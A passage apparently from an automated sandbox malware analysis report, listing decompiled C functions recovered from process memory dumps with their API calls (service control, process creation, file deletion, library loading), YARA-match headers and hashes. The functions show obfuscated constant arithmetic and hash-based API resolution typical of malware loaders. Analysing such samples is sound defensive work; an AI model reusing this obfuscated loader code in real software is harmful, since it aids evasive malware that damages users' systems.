                                              				_v8 = 0xc972;
                                              				_v8 = _v8 ^ 0x829e0126;
                                              				_v8 = _v8 + 0x4512;
                                              				_v8 = _v8 + 0xffff18f9;
                                              				_v8 = _v8 ^ 0x829e24c1;
                                              				_t27 = E007E07A9(0x6460e96, 0x9164b7cc, __ecx, __ecx, 0x114);
                                              				_t28 =  *_t27(_a8, 0, _a16, 0x28, 0, __edx, 0x28, _a8, _a12, _a16, _a20, __ecx, __ecx); // executed
                                              				return _t28;
                                              			}









                                              APIs
                                              • SetFileInformationByHandle.KERNELBASE(?,00000000,?,00000028), ref: 007DB759
                                              Memory Dump Source
                                              • Source File: 0000000C.00000002.2117263919.00000000007D1000.00000020.00000001.sdmp, Offset: 007D0000, based on PE: true
                                              • Associated: 0000000C.00000002.2117258065.00000000007D0000.00000004.00000001.sdmp
                                              • Associated: 0000000C.00000002.2117307243.00000000007EC000.00000004.00000001.sdmp
                                              Yara matches
                                              Similarity
                                              • API ID: FileHandleInformation
                                              • String ID:
                                              • API String ID: 3935143524-0
                                              • Opcode ID: f3b47d937ccbfc1dfa1fb592565fa620fdcbc58eeb5ca1dc2caafddb8630e31b
                                              • Instruction ID: 2dd34698247909c398ac4b7e91030138618d8ad558ca1caa0f39b923ac793353
                                              • Opcode Fuzzy Hash: f3b47d937ccbfc1dfa1fb592565fa620fdcbc58eeb5ca1dc2caafddb8630e31b
                                              • Instruction Fuzzy Hash: 51012CB5941308FBEF45DF94DD06E9E7BB5EB18704F108188FA0566190D3B15E209B51
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 58%
                                              			E007EAA3C(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, WCHAR* _a12) {
                                              				signed int _v8;
                                              				unsigned int _v12;
                                              				void* _t21;
                                              				int _t27;
                                              
                                              				_push(__ecx);
                                              				_push(__ecx);
                                              				_push(_a12);
                                              				_push(_a8);
                                              				_push(_a4);
                                              				_push(__ecx);
                                              				E007D602B(_t21);
                                              				_v12 = 0xcc49;
                                              				_v12 = _v12 << 6;
                                              				_v12 = _v12 >> 2;
                                              				_v12 = _v12 ^ 0x000ca988;
                                              				_v8 = 0x5d85;
                                              				_v8 = _v8 | 0xb9d19a55;
                                              				_v8 = _v8 * 0xd;
                                              				_v8 = _v8 ^ 0x6fa87272;
                                              				E007E07A9(0x330b490b, 0x9164b7cc, __ecx, __ecx, 0xb9);
                                              				_t27 = DeleteFileW(_a12); // executed
                                              				return _t27;
                                              			}








                                              APIs
                                              • DeleteFileW.KERNELBASE(?,?,?,?,A6E18774,?,?), ref: 007EAAA8
                                              Memory Dump Source
                                              • Source File: 0000000C.00000002.2117263919.00000000007D1000.00000020.00000001.sdmp, Offset: 007D0000, based on PE: true
                                              • Associated: 0000000C.00000002.2117258065.00000000007D0000.00000004.00000001.sdmp
                                              • Associated: 0000000C.00000002.2117307243.00000000007EC000.00000004.00000001.sdmp
                                              Yara matches
                                              Similarity
                                              • API ID: DeleteFile
                                              • String ID:
                                              • API String ID: 4033686569-0
                                              • Opcode ID: 45dcdf6a4fffdfc3fb2b59b925c3fbc0a67555bc5588bf158da43ded6a3f2711
                                              • Instruction ID: 147210e2122d8342fe83888b5ca690e2ffd1937bb775889c337a94b730a930d7
                                              • Opcode Fuzzy Hash: 45dcdf6a4fffdfc3fb2b59b925c3fbc0a67555bc5588bf158da43ded6a3f2711
                                              • Instruction Fuzzy Hash: 0EF019B590020CFFDF08DF94DD4A99EBFB5EB45304F108198F915A6250D3B69F649B50
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 70%
                                              			E007D5FB2(void* __ecx, void* __edx, void* _a4) {
                                              				signed int _v8;
                                              				signed int _v12;
                                              				void* _t21;
                                              				int _t27;
                                              
                                              				_push(__ecx);
                                              				_push(__ecx);
                                              				_push(_a4);
                                              				_push(__ecx);
                                              				E007D602B(_t21);
                                              				_v12 = 0x33d;
                                              				_v12 = _v12 + 0xc3dc;
                                              				_v12 = _v12 | 0x39ccfb02;
                                              				_v12 = _v12 ^ 0x39ccf342;
                                              				_v8 = 0xe8d9;
                                              				_v8 = _v8 * 0x16;
                                              				_v8 = _v8 | 0x4145347f;
                                              				_v8 = _v8 ^ 0x9035ef96;
                                              				_v8 = _v8 ^ 0xd1609914;
                                              				E007E07A9(0x6b3db31e, 0x2c3ac9a2, __ecx, __ecx, 0x1d5);
                                              				_t27 = CloseServiceHandle(_a4); // executed
                                              				return _t27;
                                              			}








                                              APIs
                                              • CloseServiceHandle.ADVAPI32(39CCF342), ref: 007D6025
                                              Memory Dump Source
                                              • Source File: 0000000C.00000002.2117263919.00000000007D1000.00000020.00000001.sdmp, Offset: 007D0000, based on PE: true
                                              • Associated: 0000000C.00000002.2117258065.00000000007D0000.00000004.00000001.sdmp
                                              • Associated: 0000000C.00000002.2117307243.00000000007EC000.00000004.00000001.sdmp
                                              Yara matches
                                              Similarity
                                              • API ID: CloseHandleService
                                              • String ID:
                                              • API String ID: 1725840886-0
                                              • Opcode ID: 07ec7a3e7fbf6174b9072a74acebe146c12452aee72241e4f1ccd61842b21ecb
                                              • Instruction ID: 4ca4490cd9fe8fc81a1194b05647fe7d730e2ca7d9f2145fca7d81760fb2159e
                                              • Opcode Fuzzy Hash: 07ec7a3e7fbf6174b9072a74acebe146c12452aee72241e4f1ccd61842b21ecb
                                              • Instruction Fuzzy Hash: DDF04FB0C11208FFDB08DFA0E94689EBFB9EB44300F208198E409A7260E7B55F559F54
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Non-executed Functions

                                              Executed Functions

                                              C-Code - Quality: 62%
                                              			E00262959(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, int _a16) {
                                              				unsigned int _v8;
                                              				signed int _v12;
                                              				void* _t30;
                                              				void* _t39;
                                              				signed int _t41;
                                              				signed int _t42;
                                              
                                              				_push(_a16);
                                              				_push(_a12);
                                              				_push(_a8);
                                              				_push(_a4);
                                              				_push(0);
                                              				_push(0);
                                              				E0026602B(_t30);
                                              				_v12 = 0x5e3c;
                                              				_t41 = 0x63;
                                              				_v12 = _v12 / _t41;
                                              				_t42 = 0x2f;
                                              				_v12 = _v12 / _t42;
                                              				_v12 = _v12 ^ 0x000064be;
                                              				_v8 = 0x74da;
                                              				_v8 = _v8 | 0xfefeeaea;
                                              				_v8 = _v8 >> 0xc;
                                              				_v8 = _v8 ^ 0x000fb531;
                                              				E002707A9(0x44082a3f, 0x2c3ac9a2, _t42, _t42, 0x18a);
                                              				_t39 = OpenSCManagerW(0, 0, _a16); // executed
                                              				return _t39;
                                              			}










                                              APIs
                                              • OpenSCManagerW.ADVAPI32(00000000,00000000,?), ref: 002629DC
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000D.00000002.2120200224.0000000000261000.00000020.00000001.sdmp, Offset: 00260000, based on PE: true
                                              • Associated: 0000000D.00000002.2120192067.0000000000260000.00000004.00000001.sdmp
                                              • Associated: 0000000D.00000002.2120237573.000000000027C000.00000004.00000001.sdmp
                                              Yara matches
                                              Similarity
                                              • API ID: ManagerOpen
                                              • String ID: <^
                                              • API String ID: 1889721586-3203995635
                                              • Opcode ID: 65485d950964110f61f8f9941fc07d1101582776214450038a05023cc6a25d4d
                                              • Instruction ID: 6d9a063f7ea6605d4a656c69f5146aac6d64d78e71d7ffdec781d4f17466abe7
                                              • Opcode Fuzzy Hash: 65485d950964110f61f8f9941fc07d1101582776214450038a05023cc6a25d4d
                                              • Instruction Fuzzy Hash: C9016D72A00108BFEB18DF95DC4A8DFBFB6EF44310F108098F508A6250D7B65F619B91
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 58%
                                              			E0026C6C7(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
                                              				signed int _v8;
                                              				unsigned int _v12;
                                              				intOrPtr _v16;
                                              				intOrPtr _v20;
                                              				intOrPtr _v24;
                                              				intOrPtr _v28;
                                              				void* _t29;
                                              				intOrPtr* _t33;
                                              				void* _t34;
                                              
                                              				E0026602B(_t29);
                                              				_v28 = 0x4fe02f;
                                              				_v24 = 0x232390;
                                              				_v20 = 0xf8460;
                                              				_v16 = 0;
                                              				_v12 = 0xf625;
                                              				_v12 = _v12 >> 6;
                                              				_v12 = _v12 >> 0xa;
                                              				_v12 = _v12 + 0xffffcc6f;
                                              				_v12 = _v12 ^ 0xffffa5b6;
                                              				_v8 = 0xe5cd;
                                              				_v8 = _v8 + 0xffffae4d;
                                              				_v8 = _v8 | 0xf8bbefe7;
                                              				_v8 = _v8 ^ 0xf8bbcc9a;
                                              				_t33 = E002707A9(0x59a47438, 0xd39e34db, __ecx, __ecx, 0x1e9);
                                              				_t34 =  *_t33(0, _a16, 0, 0, _a4, __ecx, __edx, _a4, 0, _a12, _a16, _a20, 0, 0); // executed
                                              				return _t34;
                                              			}













                                              APIs
                                              • SHGetFolderPathW.SHELL32(00000000,00232390,00000000,00000000,FFFFA5B6), ref: 0026C762
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000D.00000002.2120200224.0000000000261000.00000020.00000001.sdmp, Offset: 00260000, based on PE: true
                                              • Associated: 0000000D.00000002.2120192067.0000000000260000.00000004.00000001.sdmp
                                              • Associated: 0000000D.00000002.2120237573.000000000027C000.00000004.00000001.sdmp
                                              Yara matches
                                              Similarity
                                              • API ID: FolderPath
                                              • String ID: /O
                                              • API String ID: 1514166925-1923427199
                                              • Opcode ID: 126e875f67a9f2879335132fa059b233a736e7d205ba747755af06be747269f3
                                              • Instruction ID: 9eafb53852c98c4aba7087d8b425b2dc95f86566a6b195a773cb5418ec8fd585
                                              • Opcode Fuzzy Hash: 126e875f67a9f2879335132fa059b233a736e7d205ba747755af06be747269f3
                                              • Instruction Fuzzy Hash: D01133B290122DBBCB25DF95DC898EFBFB8EF04714F108188F90962210D3714B659BE0
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 82%
                                              			E00261000(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, WCHAR* _a12) {
                                              				unsigned int _v8;
                                              				signed int _v12;
                                              				signed int _v16;
                                              				intOrPtr _v20;
                                              				intOrPtr _v24;
                                              				void* _t33;
                                              				struct HINSTANCE__* _t40;
                                              				signed int _t42;
                                              
                                              				_push(_a12);
                                              				_push(_a8);
                                              				_push(_a4);
                                              				E0026602B(_t33);
                                              				_v16 = _v16 & 0x00000000;
                                              				_v24 = 0x1b2eda;
                                              				_v20 = 0x33a3b7;
                                              				_v12 = 0x98c;
                                              				_v12 = _v12 + 0xb426;
                                              				_v12 = _v12 + 0x5beb;
                                              				_t42 = 0x63;
                                              				_v12 = _v12 / _t42;
                                              				_v12 = _v12 ^ 0x00000fce;
                                              				_v8 = 0x120e;
                                              				_v8 = _v8 + 0xfffffcb8;
                                              				_v8 = _v8 + 0xffffefaa;
                                              				_v8 = _v8 >> 5;
                                              				_v8 = _v8 ^ 0x07ff9a02;
                                              				E002707A9(0xa900db79, 0x9164b7cc, _t42, _t42, 0xdd);
                                              				_t40 = LoadLibraryW(_a12); // executed
                                              				return _t40;
                                              			}












                                              APIs
                                              • LoadLibraryW.KERNEL32(0033A3B7), ref: 00261096
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000D.00000002.2120200224.0000000000261000.00000020.00000001.sdmp, Offset: 00260000, based on PE: true
                                              • Associated: 0000000D.00000002.2120192067.0000000000260000.00000004.00000001.sdmp
                                              • Associated: 0000000D.00000002.2120237573.000000000027C000.00000004.00000001.sdmp
                                              Yara matches
                                              Similarity
                                              • API ID: LibraryLoad
                                              • String ID: [
                                              • API String ID: 1029625771-3431493590
                                              • Opcode ID: 9c9d41f3e216c02b3eee0186e3ef491d10086b4a6365e8d72269f8dd80ebe146
                                              • Instruction ID: a6aafd67ac359982971a89c6656b5d9b115ca9250fe597342efecc921f64e71d
                                              • Opcode Fuzzy Hash: 9c9d41f3e216c02b3eee0186e3ef491d10086b4a6365e8d72269f8dd80ebe146
                                              • Instruction Fuzzy Hash: E5015BB6D01308FBDF04DF94C94A5DEBBB1AB54318F108188E41466291D3B19B689B91
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 100%
                                              			E00264859() {
                                              				signed int _v8;
                                              				signed int _v12;
                                              				void* _t22;
                                              
                                              				_v12 = 0xafe2;
                                              				_v12 = _v12 * 0x42;
                                              				_v12 = _v12 + 0xffffdd89;
                                              				_v12 = _v12 ^ 0x002d198d;
                                              				_v8 = 0x5b09;
                                              				_v8 = _v8 | 0xa1ea9544;
                                              				_v8 = _v8 * 0x12;
                                              				_v8 = _v8 ^ 0x6283d9c1;
                                              				E002707A9(0xc44181ea, 0x9164b7cc, _t22, _t22, 0x1a5);
                                              				ExitProcess(0);
                                              			}







                                              APIs
                                              • ExitProcess.KERNELBASE(00000000), ref: 002648B7
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000D.00000002.2120200224.0000000000261000.00000020.00000001.sdmp, Offset: 00260000, based on PE: true
                                              • Associated: 0000000D.00000002.2120192067.0000000000260000.00000004.00000001.sdmp
                                              • Associated: 0000000D.00000002.2120237573.000000000027C000.00000004.00000001.sdmp
                                              Yara matches
                                              Similarity
                                              • API ID: ExitProcess
                                              • String ID: [
                                              • API String ID: 621844428-1822564810
                                              • Opcode ID: ffab03bb8b36d9f8c6ed4855f41195a310f3e0c6a27eecdabbfc4dde42890251
                                              • Instruction ID: 513f1c2211b9f4615fea5d8a768133cedf2d37b0ef30595692cf4e26653409db
                                              • Opcode Fuzzy Hash: ffab03bb8b36d9f8c6ed4855f41195a310f3e0c6a27eecdabbfc4dde42890251
                                              • Instruction Fuzzy Hash: 39F017B0A15209FBDB08CFE8CA9699EBFB9EB40301F20818CE444B7290E3B15F549B54
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 66%
                                              			E00274F7D(void* __ecx, void* __edx, void* _a4) {
                                              				signed int _v8;
                                              				signed int _v12;
                                              				void* _t17;
                                              				int _t24;
                                              
                                              				_push(__ecx);
                                              				_push(__ecx);
                                              				_push(_a4);
                                              				_push(__ecx);
                                              				E0026602B(_t17);
                                              				_v12 = 0xddd8;
                                              				_v12 = _v12 * 0x48;
                                              				_v12 = _v12 ^ 0x003e66d8;
                                              				_v8 = 0xcb35;
                                              				_v8 = _v8 ^ 0x7b88573c;
                                              				_v8 = _v8 * 0x59;
                                              				_v8 = _v8 ^ 0xf27e4a21;
                                              				E002707A9(0x6d6c237b, 0x9164b7cc, __ecx, __ecx, 0xce);
                                              				_t24 = CloseHandle(_a4); // executed
                                              				return _t24;
                                              			}








                                              APIs
                                              • CloseHandle.KERNELBASE(003E66D8), ref: 00274FE2
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000D.00000002.2120200224.0000000000261000.00000020.00000001.sdmp, Offset: 00260000, based on PE: true
                                              • Associated: 0000000D.00000002.2120192067.0000000000260000.00000004.00000001.sdmp
                                              • Associated: 0000000D.00000002.2120237573.000000000027C000.00000004.00000001.sdmp
                                              Yara matches
                                              Similarity
                                              • API ID: CloseHandle
                                              • String ID: {#lm
                                              • API String ID: 2962429428-1564096886
                                              • Opcode ID: b50878758ca05e8eac60d1a1146cf5201f1efae4b397f9b7fdbd1e363743abdf
                                              • Instruction ID: 64b9e80ab57b8190464cfe717bd6af648b65d509132e68873cebd42aa26b7e96
                                              • Opcode Fuzzy Hash: b50878758ca05e8eac60d1a1146cf5201f1efae4b397f9b7fdbd1e363743abdf
                                              • Instruction Fuzzy Hash: 80F037B081120CFFDB08DFA4D98689EBFBAEB40300F208199E808AB250D3715B549B54
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 21%
                                              			E0027976F(void* __ecx, struct _PROCESS_INFORMATION* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, struct _STARTUPINFOW* _a20, int _a24, intOrPtr _a28, intOrPtr _a40, intOrPtr _a44, intOrPtr _a52, intOrPtr _a56, WCHAR* _a60, WCHAR* _a68) {
                                              				unsigned int _v8;
                                              				signed int _v12;
                                              				void* _t34;
                                              				int _t39;
                                              				struct _PROCESS_INFORMATION* _t48;
                                              
                                              				_push(__ecx);
                                              				_push(__ecx);
                                              				_t48 = __edx;
                                              				_push(0);
                                              				_push(_a68);
                                              				_push(0);
                                              				_push(_a60);
                                              				_push(_a56);
                                              				_push(_a52);
                                              				_push(0);
                                              				_push(_a44);
                                              				_push(_a40);
                                              				_push(0);
                                              				_push(0);
                                              				_push(_a28);
                                              				_push(_a24);
                                              				_push(_a20);
                                              				_push(_a16);
                                              				_push(_a12);
                                              				_push(_a8);
                                              				_push(_a4);
                                              				_push(__edx);
                                              				_push(__ecx);
                                              				E0026602B(_t34);
                                              				_v12 = 0xaff9;
                                              				_v12 = _v12 | 0xcee54bd1;
                                              				_v12 = _v12 + 0x6ed6;
                                              				_v12 = _v12 ^ 0xcee61221;
                                              				_v8 = 0x6229;
                                              				_v8 = _v8 ^ 0x42aa9f31;
                                              				_v8 = _v8 >> 2;
                                              				_v8 = _v8 ^ 0x10aad83f;
                                              				E002707A9(0xf0de9e9f, 0x9164b7cc, __ecx, __ecx, 0x155);
                                              				_t39 = CreateProcessW(_a68, _a60, 0, 0, _a24, 0, 0, 0, _a20, _t48); // executed
                                              				return _t39;
                                              			}









                                              APIs
                                              • CreateProcessW.KERNEL32(0026591A,?,00000000,00000000,?,00000000,00000000,00000000,?,?,?,?,?,?,?,0026591A), ref: 00279816
                                              Memory Dump Source
                                              • Source File: 0000000D.00000002.2120200224.0000000000261000.00000020.00000001.sdmp, Offset: 00260000, based on PE: true
                                              • Associated: 0000000D.00000002.2120192067.0000000000260000.00000004.00000001.sdmp
                                              • Associated: 0000000D.00000002.2120237573.000000000027C000.00000004.00000001.sdmp
                                              Yara matches
                                              Similarity
                                              • API ID: CreateProcess
                                              • String ID:
                                              • API String ID: 963392458-0
                                              • Opcode ID: 6869d8763d8071430bf2275e85cbffb8ce4b60d48a278036a99dc26001f63f15
                                              • Instruction ID: 2eb6e950e08b54ec22570880898c2c29c86647912668cb224e3a70f5a3ecf71b
                                              • Opcode Fuzzy Hash: 6869d8763d8071430bf2275e85cbffb8ce4b60d48a278036a99dc26001f63f15
                                              • Instruction Fuzzy Hash: 6B11B372911148FBDF199F96DC4ACDF7F7AEF89750F108148FA1556120D2728A60EBA0
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 31%
                                              			E0026B566(void* __ecx, long __edx, intOrPtr _a4, intOrPtr _a8, long _a12, intOrPtr _a16, intOrPtr _a24, intOrPtr _a28, long _a32, intOrPtr _a36, intOrPtr _a40, long _a44, WCHAR* _a48) {
                                              				unsigned int _v8;
                                              				signed int _v12;
                                              				void* _t32;
                                              				void* _t38;
                                              				long _t47;
                                              
                                              				_push(__ecx);
                                              				_push(__ecx);
                                              				_push(_a48);
                                              				_t47 = __edx;
                                              				_push(_a44);
                                              				_push(_a40);
                                              				_push(_a36);
                                              				_push(_a32);
                                              				_push(_a28);
                                              				_push(_a24);
                                              				_push(0);
                                              				_push(_a16);
                                              				_push(_a12);
                                              				_push(_a8);
                                              				_push(_a4);
                                              				_push(__edx);
                                              				_push(0);
                                              				E0026602B(_t32);
                                              				_v8 = 0xfd14;
                                              				_v8 = _v8 >> 4;
                                              				_v8 = _v8 * 0x7a;
                                              				_v8 = _v8 >> 9;
                                              				_v8 = _v8 ^ 0x00002bef;
                                              				_v12 = 0x4f26;
                                              				_v12 = _v12 | 0xe7e97f76;
                                              				_v12 = _v12 ^ 0xe7e94dbb;
                                              				E002707A9(0xfbdf2264, 0x9164b7cc, __ecx, __ecx, 0x1bd);
                                              				_t38 = CreateFileW(_a48, _a12, _t47, 0, _a44, _a32, 0); // executed
                                              				return _t38;
                                              			}









                                              APIs
                                              • CreateFileW.KERNELBASE(00270668,?,?,00000000,?,?,00000000,?,?,?,047BBE06,00270668,?,?,?,?), ref: 0026B5FD
                                              Memory Dump Source
                                              • Source File: 0000000D.00000002.2120200224.0000000000261000.00000020.00000001.sdmp, Offset: 00260000, based on PE: true
                                              • Associated: 0000000D.00000002.2120192067.0000000000260000.00000004.00000001.sdmp
                                              • Associated: 0000000D.00000002.2120237573.000000000027C000.00000004.00000001.sdmp
                                              Yara matches
                                              Similarity
                                              • API ID: CreateFile
                                              • String ID:
                                              • API String ID: 823142352-0
                                              • Opcode ID: 2ad720b21a0c423b8602bfec827dffa1ac762b31964bb8a48031e4882696984a
                                              • Instruction ID: 0327fafa4b4c3a5ec02fc6d5cb4461bd8a6135eb87ede52e0eb147eb3951bf6b
                                              • Opcode Fuzzy Hash: 2ad720b21a0c423b8602bfec827dffa1ac762b31964bb8a48031e4882696984a
                                              • Instruction Fuzzy Hash: 4511B272801248BBDF16DF95DD46CEE7F7AFF89314F148198FA1862120D3729A60EB50
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 54%
                                              			E0027981E(long __ecx, void* __edx, long _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
                                              				signed int _v8;
                                              				signed int _v12;
                                              				void* _t22;
                                              				void* _t28;
                                              				void* _t34;
                                              				long _t37;
                                              
                                              				_push(__ecx);
                                              				_push(__ecx);
                                              				_push(_a16);
                                              				_t34 = __edx;
                                              				_t37 = __ecx;
                                              				_push(_a12);
                                              				_push(_a8);
                                              				_push(_a4);
                                              				_push(__edx);
                                              				_push(__ecx);
                                              				E0026602B(_t22);
                                              				_v12 = 0xe68;
                                              				_v12 = _v12 * 0x39;
                                              				_v12 = _v12 ^ 0xd1b1d871;
                                              				_v12 = _v12 ^ 0xd1b2fb7e;
                                              				_v8 = 0x629e;
                                              				_v8 = _v8 + 0xfffff5da;
                                              				_v8 = _v8 | 0xbef7b77b;
                                              				_v8 = _v8 ^ 0xbef79fc3;
                                              				E002707A9(0xd2423672, 0x9164b7cc, __ecx, __ecx, 0x1ff);
                                              				_t28 = RtlAllocateHeap(_t34, _a4, _t37); // executed
                                              				return _t28;
                                              			}










                                              APIs
                                              • RtlAllocateHeap.NTDLL(00000000,D1B2FB7E,00000001,?,?,?,002687F2,0000CAAE,0000510C,AD82F196), ref: 0027989B
                                              Memory Dump Source
                                              • Source File: 0000000D.00000002.2120200224.0000000000261000.00000020.00000001.sdmp, Offset: 00260000, based on PE: true
                                              • Associated: 0000000D.00000002.2120192067.0000000000260000.00000004.00000001.sdmp
                                              • Associated: 0000000D.00000002.2120237573.000000000027C000.00000004.00000001.sdmp
                                              Yara matches
                                              Similarity
                                              • API ID: AllocateHeap
                                              • String ID:
                                              • API String ID: 1279760036-0
                                              • Opcode ID: 02fa28ec4255ecfe7622b3d83f76bf8205b256d3275c7cf82a1049aea6bd8148
                                              • Instruction ID: 5ff70694106fec75d80ebbbb1fc180c58c74414d7dc3a8793abe3622122be630
                                              • Opcode Fuzzy Hash: 02fa28ec4255ecfe7622b3d83f76bf8205b256d3275c7cf82a1049aea6bd8148
                                              • Instruction Fuzzy Hash: 4F015A76801208FBDB08EFD5DC46CDFBF79EF85750F108199F918A6220E6715B619BA0
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 62%
                                              			E00277BF4(struct _SHFILEOPSTRUCTW* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
                                              				signed int _v8;
                                              				signed int _v12;
                                              				void* _t24;
                                              				int _t31;
                                              				signed int _t33;
                                              				struct _SHFILEOPSTRUCTW* _t40;
                                              
                                              				_push(__ecx);
                                              				_push(__ecx);
                                              				_push(_a12);
                                              				_t40 = __ecx;
                                              				_push(_a8);
                                              				_push(_a4);
                                              				_push(__ecx);
                                              				E0026602B(_t24);
                                              				_v8 = 0xa117;
                                              				_t33 = 0x76;
                                              				_v8 = _v8 / _t33;
                                              				_v8 = _v8 >> 4;
                                              				_v8 = _v8 ^ 0x210fe703;
                                              				_v8 = _v8 ^ 0x210fdcea;
                                              				_v12 = 0xf1e9;
                                              				_v12 = _v12 << 9;
                                              				_v12 = _v12 ^ 0x01e3a445;
                                              				E002707A9(0x6b98377a, 0xd39e34db, _t33, _t33, 0x219);
                                              				_t31 = SHFileOperationW(_t40); // executed
                                              				return _t31;
                                              			}










                                              APIs
                                              • SHFileOperationW.SHELL32(68CF93E9,?,?,?,?,?,?), ref: 00277C67
                                              Memory Dump Source
                                              • Source File: 0000000D.00000002.2120200224.0000000000261000.00000020.00000001.sdmp, Offset: 00260000, based on PE: true
                                              • Associated: 0000000D.00000002.2120192067.0000000000260000.00000004.00000001.sdmp
                                              • Associated: 0000000D.00000002.2120237573.000000000027C000.00000004.00000001.sdmp
                                              Yara matches
                                              Similarity
                                              • API ID: FileOperation
                                              • String ID:
                                              • API String ID: 3080627654-0
                                              • Opcode ID: ec0cacec5e68fb90f10cfb9f5f8a6d9ee760356c7ab0c34d434bb37ff5978ad8
                                              • Instruction ID: 15bede7b27f3bd786a82ece23fb7067232dc6edd6d3e6f87bcb0e367fa32a5e8
                                              • Opcode Fuzzy Hash: ec0cacec5e68fb90f10cfb9f5f8a6d9ee760356c7ab0c34d434bb37ff5978ad8
                                              • Instruction Fuzzy Hash: B8014FB190120CFFEB09DF94CC4A8DEBBB9EF44314F108198F40567240E6B15F609B91
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 52%
                                              			E0026F65F(int __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, short* _a12, void* _a16, intOrPtr _a20) {
                                              				unsigned int _v8;
                                              				signed int _v12;
                                              				void* _t24;
                                              				void* _t29;
                                              				int _t35;
                                              
                                              				_push(__ecx);
                                              				_push(__ecx);
                                              				_push(_a20);
                                              				_t35 = __ecx;
                                              				_push(_a16);
                                              				_push(_a12);
                                              				_push(_a8);
                                              				_push(_a4);
                                              				_push(__ecx);
                                              				E0026602B(_t24);
                                              				_v12 = 0xd5a7;
                                              				_v12 = _v12 ^ 0x994cba9d;
                                              				_v12 = _v12 ^ 0x994c19d3;
                                              				_v8 = 0xac88;
                                              				_v8 = _v8 << 3;
                                              				_v8 = _v8 >> 8;
                                              				_v8 = _v8 + 0xebed;
                                              				_v8 = _v8 ^ 0x0000ab82;
                                              				E002707A9(0x1b506617, 0x2c3ac9a2, __ecx, __ecx, 0x18c);
                                              				_t29 = OpenServiceW(_a16, _a12, _t35); // executed
                                              				return _t29;
                                              			}









                                              APIs
                                              • OpenServiceW.ADVAPI32(BB1E804F,0000AB81,A536EF12), ref: 0026F6D8
                                              Memory Dump Source
                                              • Source File: 0000000D.00000002.2120200224.0000000000261000.00000020.00000001.sdmp, Offset: 00260000, based on PE: true
                                              • Associated: 0000000D.00000002.2120192067.0000000000260000.00000004.00000001.sdmp
                                              • Associated: 0000000D.00000002.2120237573.000000000027C000.00000004.00000001.sdmp
                                              Yara matches
                                              Similarity
                                              • API ID: OpenService
                                              • String ID:
                                              • API String ID: 3098006287-0
                                              • Opcode ID: 6567ea87a17df60c0308b73184139fb23dc7eaa7bd850ee34e454fe5b2712021
                                              • Instruction ID: 1418f5eaa3fe879dfa5cd0ed18178fc83abf0b6380ca8bfaeba733e2abfab5c9
                                              • Opcode Fuzzy Hash: 6567ea87a17df60c0308b73184139fb23dc7eaa7bd850ee34e454fe5b2712021
                                              • Instruction Fuzzy Hash: 1B01E5B6901208BBEF059F94DC4A8DF7F79EB05324F148188F90462250D6B25E61DBA1
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 58%
                                              			E0026B6DD(void* __ecx, void* __edx, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
                                              				signed int _v8;
                                              				unsigned int _v12;
                                              				void* _t23;
                                              				intOrPtr* _t27;
                                              				void* _t28;
                                              
                                              				E0026602B(_t23);
                                              				_v12 = 0x9431;
                                              				_v12 = _v12 >> 7;
                                              				_v12 = _v12 ^ 0x0000160f;
                                              				_v8 = 0xc972;
                                              				_v8 = _v8 ^ 0x829e0126;
                                              				_v8 = _v8 + 0x4512;
                                              				_v8 = _v8 + 0xffff18f9;
                                              				_v8 = _v8 ^ 0x829e24c1;
                                              				_t27 = E002707A9(0x6460e96, 0x9164b7cc, __ecx, __ecx, 0x114);
                                              				_t28 =  *_t27(_a8, 0, _a16, 0x28, 0, __edx, 0x28, _a8, _a12, _a16, _a20, __ecx, __ecx); // executed
                                              				return _t28;
                                              			}









                                              APIs
                                              • SetFileInformationByHandle.KERNELBASE(?,00000000,?,00000028), ref: 0026B759
                                              Memory Dump Source
                                              • Source File: 0000000D.00000002.2120200224.0000000000261000.00000020.00000001.sdmp, Offset: 00260000, based on PE: true
                                              • Associated: 0000000D.00000002.2120192067.0000000000260000.00000004.00000001.sdmp
                                              • Associated: 0000000D.00000002.2120237573.000000000027C000.00000004.00000001.sdmp
                                              Yara matches
                                              Similarity
                                              • API ID: FileHandleInformation
                                              • String ID:
                                              • API String ID: 3935143524-0
                                              • Opcode ID: f3b47d937ccbfc1dfa1fb592565fa620fdcbc58eeb5ca1dc2caafddb8630e31b
                                              • Instruction ID: 4dd1523c19ab64ff83871dcd57a5abbbe39d3232c1b981a46ec92c34d3210dea
                                              • Opcode Fuzzy Hash: f3b47d937ccbfc1dfa1fb592565fa620fdcbc58eeb5ca1dc2caafddb8630e31b
                                              • Instruction Fuzzy Hash: 3A018BB294030CFBEF45DF94DD06E9E7BB5EF08704F108188FA09261A0D3B25E20AB61
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 58%
